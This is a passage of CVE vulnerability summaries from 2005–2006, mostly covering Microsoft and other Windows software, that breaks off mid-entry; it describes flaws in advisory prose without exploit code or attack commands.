Microsoft Visual Studio 2005 automatically executes code in the Load event of a user-defined control (UserControl1_Load function), which allows user-assisted attackers to execute arbitrary code by tricking the user into opening a malicious Visual Studio project file. [CVE-2006-0166] Symantec Norton SystemWorks and SystemWorks Premier 2005 and 2006 stores temporary copies of files in the Norton Protected Recycle Bin NProtect directory, which is hidden from the FindFirst and FindNext Windows APIs and allows remote attackers to hide arbitrary files from virus scanners and other products. [CVE-2006-0106] gdi/driver.c and gdi/printdrv.c in Wine 20050930, and other versions, implement the SETABORTPROC GDI Escape function call for Windows Metafile (WMF) files, which allows attackers to execute arbitrary code, the same vulnerability as CVE-2005-4560 but in a different codebase. [CVE-2006-0105] PostgreSQL 8.0.x before 8.0.6 and 8.1.x before 8.1.2, when running on Windows, allows remote attackers to cause a denial of service (postmaster exit and no new connections) via a large number of simultaneous connection requests. [CVE-2006-0097] Stack-based buffer overflow in the create_named_pipe function in libmysql.c in PHP 4.3.10 and 4.4.x before 4.4.3 for Windows allows attackers to execute arbitrary code via a long (1) arg_host or (2) arg_unix_socket argument, as demonstrated by a long named pipe variable in the host argument to the mysql_connect function. [CVE-2006-0057] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to bypass the Kill bit settings for dangerous ActiveX controls via unknown vectors involving crafted HTML, which can expose the browser to attacks that would otherwise be prevented by the Kill bit setting. NOTE: CERT/CC claims that MS05-054 fixes this issue, but it is not described in MS05-054. [CVE-2006-0033] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via a crafted PNG image that triggers memory corruption when it is parsed. [CVE-2006-0031] Stack-based buffer overflow in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed record with a modified length value, which leads to memory corruption. [CVE-2006-0030] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed graphic, which leads to memory corruption. [CVE-2006-0029] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed description, which leads to memory corruption. [CVE-2006-0028] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via a BIFF parsing format file containing malformed BOOLERR records that lead to memory corruption, probably involving invalid pointers. [CVE-2006-0027] Unspecified vulnerability in Microsoft Exchange allows remote attackers to execute arbitrary code via e-mail messages with crafted (1) vCal or (2) iCal Calendar properties. [CVE-2006-0026] Buffer overflow in Microsoft Internet Information Services (IIS) 5.0, 5.1, and 6.0 allows local and possibly remote attackers to execute arbitrary code via crafted Active Server Pages (ASP). [CVE-2006-0022] Unspecified vulnerability in Microsoft PowerPoint in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP1 and SP2, Office 2004 for Mac, and v. X for Mac allows user-assisted attackers to execute arbitrary code via a PowerPoint document with a malformed record, which triggers memory corruption. [CVE-2006-0015] Cross-site scripting (XSS) vulnerability in _vti_bin/_vti_adm/fpadmdll.dll in Microsoft FrontPage Server Extensions 2002 and SharePoint Team Services allows remote attackers to inject arbitrary web script or HTML, then leverage the attack to execute arbitrary programs or create new accounts, via the (1) operation, (2) command, and (3) name parameters. [CVE-2006-0009] Buffer overflow in Microsoft Office 2000 SP3, XP SP3, and other versions and packages, allows user-assisted attackers to execute arbitrary code via a routing slip that is longer than specified by the provided length field, as exploited by malware such as TROJ_MDROPPER.BH and Trojan.PPDropper.E in attacks against PowerPoint. [CVE-2006-0007] Buffer overflow in GIFIMP32.FLT, as used in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via a crafted GIF image that triggers memory corruption when it is parsed. [CVE-2006-0004] Microsoft PowerPoint 2000 in Office 2000 SP3 has an interaction with Internet Explorer that allows remote attackers to obtain sensitive information via a PowerPoint presentation that attempts to access objects in the Temporary Internet Files Folder (TIFF). [CVE-2006-0003] Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors. [CVE-2006-0002] Unspecified vulnerability in Microsoft Outlook 2000 through 2003, Exchange 5.0 Server SP2 and 5.5 SP4, Exchange 2000 SP3, and Office allows remote attackers to execute arbitrary code via an e-mail message with a crafted Transport Neutral Encapsulation Format (TNEF) MIME attachment, related to message length validation. [CVE-2006-0001] Stack-based buffer overflow in Microsoft Publisher 2000 through 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted PUB file, which causes an overflow when parsing fonts. [CVE-2005-4827] Internet Explorer 6.0, and possibly other versions, allows remote attackers to bypass the same origin security policy and make requests outside of the intended domain by calling open on an XMLHttpRequest object (Microsoft.XMLHTTP) and using tab, newline, and carriage return characters within the first argument (method name), which is supported by some proxy servers that convert tabs to spaces. NOTE: this issue can be leveraged to conduct referer spoofing, HTTP Request Smuggling, and other attacks. [CVE-2005-4812] The SISCO OSI stack for Windows, as used by MMS-EASE 7.10 and earlier, AX-S4 MMS 5.01 and earlier, AX-S4 ICCP 3.0103 and earlier, and the ICCP Toolkit for MMS-EASE 4.10 and earlier, allows remote attackers to cause a denial of service (process crash) via certain network traffic, as demonstrated using a Nessus scan. [CVE-2005-4810] Microsoft Internet Explorer 7.0 Beta3 and earlier allows remote attackers to cause a denial of service (crash) via a "text/html" HTML Content-type header sent in response to an XMLHttpRequest (AJAX). [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto. [CVE-2005-4697] The Microsoft Wireless Zero Configuration system (WZCS) allows local users to access WEP keys and pair-wise Master Keys (PMK) of the WPA pre-shared key via certain calls to the WZCQueryInterface API function in wzcsapi.dll. [CVE-2005-4696] The Microsoft Wireless Zero Configuration system (WZCS) stores WEP keys and pair-wise Master Keys (PMK) of the WPA pre-shared key in plaintext in memory of the explorer process, which allows attackers with access to process memory to steal the keys and access the network. [CVE-2005-4679] Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to spoof the URL in the status bar via the title in an image in a link to a trusted site within a form to the malicious site. [CVE-2005-4579] Multiple HTTP response splitting vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary HTTP headers via unknown attack vectors in an unspecified input form. [CVE-2005-4578] Multiple SQL injection vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to execute arbitrary SQL commands via unknown attack vectors in an unspecified input form. [CVE-2005-4577] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in an unspecified input form. [CVE-2005-4505] Unquoted Windows search path vulnerability in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run by naPrdMgr.exe when it attempts to execute EntVUtil.EXE under an unquoted "Program Files" path. [CVE-2005-4417] The default configuration of Widcomm Bluetooth for Windows (BTW) 4.0.1.1500 and earlier, as installed on Belkin Bluetooth Software 1.4.2 Build 10 and ANYCOM Blue USB-130-250 Software 4.0.1.1500, and possibly other devices, sets null Authentication and Authorization values, which allows remote attackers to send arbitrary audio and possibly eavesdrop using the microphone via the Hands Free Audio Gateway and Headset profile. [CVE-2005-4210] Opera before 8.51, when running on Windows with Input Method Editor (IME) installed, allows remote attackers to cause a denial of service (persistent application crash) by bookmarking a site with a long title. [CVE-2005-4131] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed range, which could lead to memory corruption involving an argument to the msvcrt.memmove function, aka "Brand new Microsoft Excel Vulnerability," as originally placed for sale on eBay as item number 7203336538. [CVE-2005-4089] Microsoft Internet Explorer allows remote attackers to bypass cross-domain security restrictions and obtain sensitive information by using the @import directive to download files from other domains that are not valid Cascading Style Sheets (CSS) files, as demonstrated using Google Desktop, aka "CSSXSS" and "CSS Cross-Domain Information Disclosure Vulnerability." [CVE-2005-3983] Unknown vulnerability in the login page for HP Systems Insight Manager (SIM) 4.0 and 4.1, when accessed by Microsoft Internet Explorer with the MS04-025 patch, leads to a denial of service (browser hang). NOTE: although the advisory is vague, this issue does not appear to involve an attacker at all. If not, then this issue is not a vulnerability. [CVE-2005-3889] Gadu-Gadu 7.20 allows remote attackers to cause a denial of service via multiple DCC packets with a code of 6 or 7, which triggers a large number of popup windows to the user and creates a large number of threads. [CVE-2005-3886] Unspecified vulnerability in Cisco Security Agent (CSA) 4.5.0 and 4.5.1 agents, when running on Windows systems, allows local users to bypass protections and gain system privileges by executing certain local software. [CVE-2005-3663] Unquoted Windows search path vulnerability in Kaspersky Anti-Virus 5.0 might allow local users to gain privileges via a malicious "program.exe" file in the C: folder. [CVE-2005-3643] IBM DB2 Database server running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication and log on to the guest account without supplying a password. [CVE-2005-3642] IBM Informix Dynamic Database server running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication and log on to the guest account by supplying an invalid username. [CVE-2005-3641] Oracle Databases running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication by supplying a valid username. [CVE-2005-3591] Macromedia Flash plugin (1) Flash.ocx 7.0.19.0 (Windows) and earlier and (2) libflashplayer.so before 7.0.25.0 (Unix) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via parameters to the ActionDefineFunction ActionScript call in a SWF file, which causes an improper memory access condition, a different vulnerability than CVE-2005-2628. [CVE-2005-3568] db2fmp process in IBM DB2 Content Manager before 8.2 Fix Pack 10 allows local users to cause a denial of service (CPU consumption) by importing a corrupted Microsoft Excel file, aka "CORRUPTED EXEL FILE WILL CAUSE TEXT SEARCH PROCESS LOOPING." [CVE-2005-3483] Buffer overflow in GO-Global for Windows 3.1.0.3270 and earlier allows remote attackers to execute arbitrary code via a data block that is longer than the specified data block size. [CVE-2005-3468] Directory traversal vulnerability in F-Secure Anti-Virus for Microsoft Exchange 6.40 and Internet Gatekeeper 6.40 to 6.42 allows limited remote attackers to bypass Web Console authentication and read files. [CVE-2005-3421] estcmd in Hyper Estraier 1.0.1 on Windows systems allows remote attackers to read unauthorized files via a crafted search request for a filename that contains Unicode characters. [CVE-2005-3312] The HTML rendering engine in Microsoft Internet Explorer 6.0 allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML in corrupted images and other files such as .GIF, JPG, and WAV, which is rendered as HTML when the user clicks on the link, even though the web server response and file extension indicate that it should be treated as a different file type. [CVE-2005-3284] Multiple buffer overflows in AhnLab V3 AntiVirus V3Pro 2004 before 6.0.0.488, V3Net for Windows Server 6.0 before 6.0.0.488, and MyV3, with compressed file scanning enabled, allow remote attackers to execute arbitrary code via crafted (1) ALZ, (2) UUE, or (3) XXE archives. [CVE-2005-3267] Integer overflow in Skype client before 1.4.x.84 on Windows, before 1.3.x.17 on Mac OS, before 1.2.x.18 on Linux, and 1.1.x.6 and earlier allows remote attackers to cause a denial of service (crash) via crafted network data with a large Object Counter value, which leads to a resultant heap-based buffer overflow. [CVE-2005-3265] Buffer overflow in Skype for Windows 1.1.x.0 through 1.4.x.83 allows remote attackers to execute arbitrary code via (1) callto:// and (2) skype:// links, or (3) a non-standard VCARD, possibly due to an underlying error in the SysUtils.WideFmtStr Delphi routine. [CVE-2005-3240] Race condition in Microsoft Internet Explorer allows user-assisted attackers to overwrite arbitrary files and possibly execute code by tricking a user into performing a drag-and-drop action from certain objects, such as file objects within a folder view, then predicting the drag action, and re-focusing to a malicious window. [CVE-2005-3182] Buffer overflow in the HTTP management interface for GFI MailSecurity 8.1 allows remote attackers to execute arbitrary code via long headers such as (1) Host and (2) Accept in HTTP requests. NOTE: the vendor suggests that this issues is "in an underlying Microsoft technology" which, if true, could mean that the overflow affects other products as well. [CVE-2005-3156] Directory traversal vulnerability in printfaq.php in EasyGuppy (Guppy for Windows) 4.5.4 and 4.5.5 allows remote attackers to read arbitrary files via ".." sequences in the pg parameter, which is cleansed for XSS but not directory traversal. [CVE-2005-3077] Microsoft Internet Explorer 5.2.3 for Mac OS allows remote attackers to cause a denial of service (crash) via a web page with malformed attributes in a BGSOUND tag, possibly involving double-quotes in an about: URI. [CVE-2005-3059] Multiple unspecified vulnerabilities in Opera 8.50 on Linux and Windows have unknown impact and attack vectors, related to (1) " handling of must-revalidate cache directive for HTTPS pages" or (2) a "display issue with cookie comment encoding." [CVE-2005-3041] Unspecified "drag-and-drop vulnerability" in Opera Web Browser before 8.50 on Windows allows "unintentional file uploads." [CVE-2005-3030] Directory traversal vulnerability in the archive decompression library in AhnLab V3Pro 2004 build 6.0.0.383, V3 VirusBlock 2005 build 6.0.0.383, and V3Net for Windows Server 6.0 build 6.0.0.383 allows remote attackers to write arbitrary files via a .. (dot dot) in the filename in a compressed archive. [CVE-2005-3029] Stack-based buffer overflow in AhnLab V3Pro 2004 build 6.0.0.383, V3 VirusBlock 2005 build 6.0.0.383, and V3Net for Windows Server 6.0 build 6.0.0.383 allows remote attackers to execute arbitrary code via a long filname in an ACE archive. [CVE-2005-2986] The v3flt2k.sys driver in AhnLab V3Pro 2004 Build 6.0.0.383, V3 VirusBlock 2005 Build 6.0.0.383, V3Net for Windows Server 6.0 Build 6.0.0.383 does not properly validate the source of the DeviceIoControl commands, which allows remote attackers to gain privileges. [CVE-2005-2957] Stack-based buffer overflow in AVIRA Desktop for Windows 1.00.00.68 with AVPACK32.DLL 6.31.0.3, when archive scanning is enabled, allows remote attackers to execute arbitrary code via a long filename in an ACE archive. [CVE-2005-2939] Unquoted Windows search path vulnerability in VMWare Workstation 5.0.0 build-13124 might allow local users to gain privileges via a malicious "program.exe" file in the C: folder. [CVE-2005-2938] Unquoted Windows search path vulnerability in iTunesHelper.exe in iTunes 4.7.1.30 and iTunes 5 for Windows might allow local users to gain privileges via a malicious C:\program.exe file. [CVE-2005-2936] Unquoted Windows search path vulnerability in RealNetworks RealPlayer 10.5 6.0.12.1040 through 6.0.12.1348, RealPlayer 10, RealOne Player v2, RealOne Player v1, and RealPlayer 8 before 20060322 might allow local users to gain privileges via a malicious C:\program.exe file. [CVE-2005-2858] The Fetch.FetchContact.1 ActiveX control (Fetch.dll) for Rediff Bol 7.0 allows remote attackers to read the Windows Address Book via the FullAddressBook method. [CVE-2005-2831] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, aka a variant of the "COM Object Instantiation Memory Corruption Vulnerability," a different vulnerability than CVE-2005-2127. [CVE-2005-2830] Microsoft Internet Explorer 5.01, 5.5, and 6, when using an HTTPS proxy server that requires Basic Authentication, sends URLs in cleartext, which allows remote attackers to obtain sensitive information, aka "HTTPS Proxy Vulnerability." [CVE-2005-2829] Multiple design errors in Microsoft Internet Explorer 5.01, 5.5, and 6 allow user-assisted attackers to execute arbitrary code by (1) overlaying a malicious new window above a file download box, then (2) using a keyboard shortcut and delaying the display of the file download box until the user hits a shortcut that activates the "Run" button, aka "File Download Dialog Box Manipulation Vulnerability." [CVE-2005-2827] The thread termination routine in the kernel for Windows NT 4.0 and 2000 (NTOSKRNL.EXE) allows local users to modify kernel memory and execution flow via steps in which a terminating thread causes Asynchronous Procedure Call (APC) entries to free the wrong data, aka the "Windows Kernel Vulnerability." [CVE-2005-2804] Integer overflow in the registry parsing code in GroupWise 6.5.3, and possibly earlier version, allows remote attackers to cause a denial of service (application crash) via a large TCP/IP port in the Windows registry key. [CVE-2005-2771] WRQ Reflection for Secure IT Windows Server 6.0 (formerly known as F-Secure SSH server) processes access and deny lists in a case-sensitive manner, when previous versions were case-insensitive, which might allow remote attackers to bypass intended restrictions and login to accounts that should be denied. [CVE-2005-2770] WRQ Reflection for Secure IT Windows Server 6.0 (formerly known as F-Secure SSH server) does not properly handle when the Windows Administrator or Guest accounts are renamed after SSH key authentication has been configured, which allows remote attackers to use the original names during login. [CVE-2005-2765] The user interface in the Windows Firewall does not properly display certain malformed entries in the Windows Registry, which makes it easier for attackers with administrator privileges to hide activities if the administrator only uses the Windows Firewall interface to monitor exceptions. NOTE: the vendor disputes this issue, saying that since administrative privileges are already required, it is not a vulnerability. CVE has not yet formally decided if such "information hiding" issues should be included. [CVE-2005-2726] Directory traversal vulnerability in Home Ftp Server 1.0.7 allows remote authenticated users to read arbitrary files via "C:\" (Windows drive letter) sequences in commands such as (1) LIST or (2) RETR. [CVE-2005-2707] Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to spawn windows without user interface components such as the address and status bar, which could be used to conduct spoofing or phishing attacks. [CVE-2005-2678] Microsoft IIS 5.1 and 6 allows remote attackers to spoof the SERVER_NAME variable to bypass security checks and conduct various attacks via a GET request with an http://localhost URI, which makes it appear as if the request is coming from localhost. [CVE-2005-2611] VERITAS Backup Exec for Windows Servers 8.6 through 10.0, Backup Exec for NetWare Servers 9.0 and 9.1, and NetBackup for NetWare Media Server Option 4.5 through 5.1 uses a static password during authentication from the NDMP agent to the server, which allows remote attackers to read and write arbitrary files with the backup server. [CVE-2005-2573] The mysql_create_function function in sql_udf.cc for MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta, when running on Windows, uses an incomplete blacklist in a directory traversal check, which allows attackers to include arbitrary files via the backslash (\) character. [CVE-2005-2572] MySQL, when running on Windows, allows remote authenticated users with insert privileges on the mysql.func table to cause a denial of service (server hang) and possibly execute arbitrary code via (1) a request for a non-library file, which causes the Windows LoadLibraryEx function to block, or (2) a request for a function in a library that has the XXX_deinit or XXX_init functions defined but is not tailored for mySQL, such as jpeg1x32.dll and jpeg2x32.dll. [CVE-2005-2551] Buffer overflow in dhost.exe in iMonitor for Novell eDirectory 8.7.3 on Windows allows attackers to cause a denial of service (crash) and obtain access to files via unknown vectors. [CVE-2005-2502] Buffer overflow in AppKit for Mac OS X 10.3.9 and 10.4.2, as used in applications such as TextEdit, allows external user-assisted attackers to execute arbitrary code via a crafted Microsoft Word file. [CVE-2005-2429] Firefox, when opening Microsoft Word documents, does not properly set the permissions on shared sections, which allows remote attackers to write arbitrary data to open applications in Microsoft Office. [CVE-2005-2371] Directory traversal vulnerability in Oracle Reports 6.0, 6i, 9i, and 10g allows remote attackers to overwrite arbitrary files via (1) "..", (2) Windows drive letter (C:), and (3) absolute path sequences in the desname parameter. NOTE: this issue was probably fixed by REP06 in CPU Jan 2006, in which case it overlaps CVE-2006-0289. [CVE-2005-2308] The JPEG decoder in Microsoft Internet Explorer allows remote attackers to cause a denial of service (CPU consumption or crash) and possibly execute arbitrary code via certain crafted JPEG images, as demonstrated using (1) mov_fencepost.jpg, (2) cmp_fencepost.jpg, (3) oom_dos.jpg, or (4) random.jpg. [CVE-2005-2304] Microsoft MSN Messenger 9.0 and Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) via an image with an ICC Profile with a large Tag Count. [CVE-2005-2274] Microsoft Internet Explorer 6.0 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability." [CVE-2005-2226] Microsoft Outlook Express 6.0 leaks the default news server account when a user responds to a "watched" conversation thread, which could allow remote attackers to obtain sensitive information. [CVE-2005-2225] Microsoft MSN Messenger allows remote attackers to cause a denial of service via a plaintext message containing the ".pif" string, which is interpreted as a malicious file extension and causes users to be kicked from a group conversation. NOTE: it has been reported that Gaim is also affected, so this may be an issue in the protocol or MSN servers. [CVE-2005-2224] aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method. [CVE-2005-2150] Windows NT 4.0 and Windows 2000 before URP1 for Windows 2000 SP4 does not properly prevent NULL sessions from accessing certain alternate named pipes, which allows remote attackers to (1) list Windows services via svcctl or (2) read eventlogs via eventlog. [CVE-2005-2146] SSH Tectia Server 4.3.1 and earlier, and SSH Secure Shell for Windows Servers, uses insecure permissions when generating the Secure Shell host identification key, which allows local users to access the key and spoof the server. [CVE-2005-2143] Microsoft Front Page allows attackers to cause a denial of service (crash) via a crafted style tag in a web page. [CVE-2005-2127] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, as originally demonstrated using the (1) DDS Library Shape Control (Msdds.dll) COM object, and other objects including (2) Blnmgrps.dll, (3) Ciodm.dll, (4) Comsvcs.dll, (5) Danim.dll, (6) Htmlmarq.ocx, (7) Mdt2dd.dll (as demonstrated using a heap corruption attack with uninitialized memory), (8) Mdt2qd.dll, (9) Mpg4ds32.ax, (10) Msadds32.ax, (11) Msb1esen.dll, (12) Msb1fren.dll, (13) Msb1geen.dll, (14) Msdtctm.dll, (15) Mshtml.dll, (16) Msoeacct.dll, (17) Msosvfbr.dll, (18) Mswcrun.dll, (19) Netshell.dll, (20) Ole2disp.dll, (21) Outllib.dll, (22) Psisdecd.dll, (23) Qdvd.dll, (24) Repodbc.dll, (25) Shdocvw.dll, (26) Shell32.dll, (27) Soa.dll, (28) Srchui.dll, (29) Stobject.dll, (30) Vdt70.dll, (31) Vmhelper.dll, and (32) Wbemads.dll, aka a variant of the "COM Object Instantiation Memory Corruption vulnerability." [CVE-2005-2126] The FTP client in Windows XP SP1 and Server 2003, and Internet Explorer 6 SP1 on Windows 2000 SP4, when "Enable Folder View for FTP Sites" is enabled and the user manually initiates a file transfer, allows user-assisted, remote FTP servers to overwrite files in arbitrary locations via crafted filenames. [CVE-2005-2124] Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked buffer" and possibly buffer overflows, allows remote attackers to execute arbitrary code via a crafted Windows Metafile (WMF) format image, aka "Windows Metafile Vulnerability." [CVE-2005-2123] Multiple integer overflows in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allow remote attackers to execute arbitrary code via crafted Windows Metafile (WMF) and Enhanced Metafile (EMF) format images that lead to heap-based buffer overflows, as demonstrated using MRBP16::bCheckRecord. [CVE-2005-2119] The MIDL_user_allocate function in the Microsoft Distributed Transaction Coordinator (MSDTC) proxy (MSDTCPRX.DLL) allocates a 4K page of memory regardless of the required size, which allows attackers to overwrite arbitrary memory locations using an incorrect size value that is provided to the NdrAllocate function, which writes management data to memory outside of the allocated buffer. [CVE-2005-2089] Microsoft IIS 5.0 and 6.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes IIS to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2087] Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem. [CVE-2005-2080] Unknown vulnerability in Remote Agent for Windows Servers (RAWS) in VERITAS Backup Exec 9.0 through 10.0 for Windows, and 9.0.4019 through 9.1.307 for NetWare, allows remote attackers to gain privileges by copying the handle for the server. [CVE-2005-2079] Heap-based buffer overflow in the Admin Plus Pack Option for VERITAS Backup Exec 9.0 through 10.0 for Windows Servers allows remote attackers to execute arbitrary code. [CVE-2005-1970] Symantec pcAnywhere 10.5x and 11.x before 11.5, with "Launch with Windows" enabled, allows local users with physical access to execute arbitrary commands via the Caller Properties feature. [CVE-2005-1935] Heap-based buffer overflow in the BERDecBitString function in Microsoft ASN.1 library (MSASN1.DLL) allows remote attackers to execute arbitrary code via nested constructed bit strings, which leads to a realloc of a non-null pointer and causes the function to overwrite previously freed memory, as demonstrated using a SPNEGO token with a constructed bit string during HTTP authentication, and a different vulnerability than CVE-2003-0818. NOTE: the researcher has claimed that MS:MS04-007 fixes this issue. [CVE-2005-1929] Multiple heap-based buffer overflows in (1) isaNVWRequest.dll and (2) relay.dll in Trend Micro ServerProtect Management Console 5.58 and earlier, as used in Control Manager 2.5 and 3.0 and Damage Cleanup Server 1.1, allow remote attackers to execute arbitrary code via "wrapped" length values in Chunked transfer requests. NOTE: the original report suggests that the relay.dll issue is related to a problem in which a Microsoft Foundation Classes (MFC) static library returns invalid values under heavy load. As such, this might not be a vulnerability in Trend Micro's product. [CVE-2005-1928] Trend Micro ServerProtect EarthAgent for Windows Management Console 5.58 and possibly earlier versions, when running with Trend Micro Control Manager 2.5 and 3.0, and Damage Cleanup Server 1.1, allows remote attackers to cause a denial of service (CPU consumption) via a flood of crafted packets with a certain "magic value" to port 5005, which also leads to a memory leak. [CVE-2005-1907] The ISA Firewall service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (Wspsrv.exe crash) via a large amount of SecureNAT network traffic. [CVE-2005-1905] The klif.sys driver in Kaspersky Labs Anti-Virus 5.0.227, 5.0.228, and 5.0.335 on Windows 2000 allows local users to gain privileges by modifying certain critical code addresses that are later accessed by privileged programs. [CVE-2005-1829] Microsoft Internet Explorer 6 SP2 allows remote attackers to cause a denial of service (infinite loop and application crash) via two embedded files that call each other. [CVE-2005-1794] Microsoft Terminal Server using Remote Desktop Protocol (RDP) 5.2 stores an RSA private key in mstlsapi.dll and uses it to sign a certificate, which allows remote attackers to spoof public keys of legitimate servers and conduct man-in-the-middle attacks. [CVE-2005-1792] Memory leak in Windows Management Instrumentation (WMI) service allows attackers to cause a denial of service (memory consumption and crash) by creating security contexts more quickly than they can be cleared from the RPC cache. [CVE-2005-1791] Microsoft Internet Explorer 6 SP2 (6.0.2900.2180) crashes when the user attempts to add a URI to the restricted zone, in which the full domain name of the URI begins with numeric sequences similar to an IP address. NOTE: if there is not an exploit scenario in which an attacker can trigger this behavior, then perhaps this issue should not be included in CVE. [CVE-2005-1790] Microsoft Internet Explorer 6 SP2 6.0.2900.2180 and 6.0.2800.1106, and earlier versions, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a Javascript BODY onload event that calls the window function, aka "Mismatched Document Object Model Objects Memory Corruption Vulnerability." [CVE-2005-1766] Heap-based buffer overflow in rtffplin.cpp in RealPlayer 10.5 6.0.12.1056 on Windows, and 10, 10.0.1.436, and other versions before 10.0.5 on Linux, allows remote attackers to execute arbitrary code via a RealMedia file with a long RealText string, such as an SMIL file. [CVE-2005-1719] Unknown vulnerability in ALWIL avast! antivirus 4 (4.6.6230) and earlier, when running on Windows NT 4.0, does not properly detect certain viruses. [CVE-2005-1683] Buffer overflow in winword.exe 10.2627.6714 and earlier in Microsoft Word for the Macintosh, before SP3 for Word 2002, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted mcw file. [CVE-2005-1665] The __VIEWSTATE functionality in Microsoft ASP.NET 1.x, when not cryptographically signed, allows remote attackers to cause a denial of service (CPU consumption) via deeply nested markup. [CVE-2005-1664] The __VIEWSTATE functionality in Microsoft ASP.NET 1.x allows remote attackers to conduct replay attacks to (1) apply a ViewState generated from one view to a different view, (2) reuse ViewState information after the application's state has changed, or (3) use the ViewState to conduct attacks or expose content to third parties. [CVE-2005-1649] The IPv6 support in Windows XP SP2, 2003 Server SP1, and Longhorn, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, a variant of CVE-2005-0688 and a reoccurrence of the "Land" vulnerability (CVE-1999-0016). [CVE-2005-1590] The Altiris Client Service for Windows (ACLIENT.EXE) 6.0.88 allows local users to disable password protection and access the administrative interface by finding and showing the "Altiris Client Service" hidden window, disabling the password protection, disabling the "Hide client tray icon box" option, then opening the AClient tray icon and using the View Log File option, a different vulnerability than CVE-2004-2070. [CVE-2005-1576] The file download dialog in Mozilla Firefox 0.10.1 and 1.0 for Windows uses the Content-Type HTTP header to determine the file type, but saves the original file extension when "Save to Disk" is selected, which allows remote attackers to hide the real file types of downloaded files. [CVE-2005-1575] The file download dialog in Mozilla Firefox 0.10.1 and 1.0 for Windows allows remote attackers to hide the real file types of downloaded files via the Content-Type HTTP header and a filename containing whitespace, dots, or ASCII byte 160. [CVE-2005-1574] Windows Media Player 9 and 10, in certain cases, allows content protected by Windows Media Digital Rights Management (WMDRM) to redirect the user to a web site to obtain a license, even when the "Acquire licenses automatically for protected content" setting is not enabled. [CVE-2005-1407] Skype for Windows 1.2.0.0 to 1.2.0.46 allows local users to bypass the identity check for an authorized application, then call arbitrary Skype API functions by modifying or replacing that application. [CVE-2005-1346] Multiple Symantec AntiVirus products, including Norton AntiVirus 2005 11.0.0, Web Security Web Security 3.0.1.72, Mail Security for SMTP 4.0.5.66, AntiVirus Scan Engine 4.3.7.27, SAV/Filter for Domino NT 3.1.1.87, and 